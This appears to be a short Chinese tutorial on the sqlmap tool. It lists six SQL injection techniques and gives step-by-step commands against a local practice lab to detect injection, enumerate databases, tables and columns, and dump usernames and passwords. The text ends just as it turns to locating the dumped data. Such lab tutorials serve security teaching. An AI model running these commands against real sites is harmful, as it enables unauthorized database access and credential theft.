一,sqlmap支持的六种注入方式
1,基于布尔的盲注
通过返回页面判断条件真假的注入
2,基于时间的盲注
不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加来判断)
3,基于报错注入
页面会返回报错信息,或者直接把注入的语句直接返回在页面中
4,联合查询注入
使用union情况下的注入
5,堆查询注入
可以同时执行多条语句的执行时的注入
6,内联查询注入
在sql语句中执行sql语句
二,sqlmap的基本使用
1,检查是否存在注入点
python sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1"
2,查看所有数据库
python sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" --dbs
3,查看当前使用的数据库
python sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" --current-db
4,查看表名
python sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" -D security --tables
-D指定数据库,--tables列出表名
5,列出表中所有字段名
python sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" -D security -T users --columns
-D指定数据库,-T指定表名,-columns列出所有字段
6,列出字段内容(数据)
python sqlmap.py -u "http://127.0.0.1/sql/Less-1/?id=1" -D security -T users -C username,password --dump
-D指定数据库,-T指定数据表,-C指定要列出的字段,--dump列出字段内容,转存数据
根据提示内容找到转存的数据:
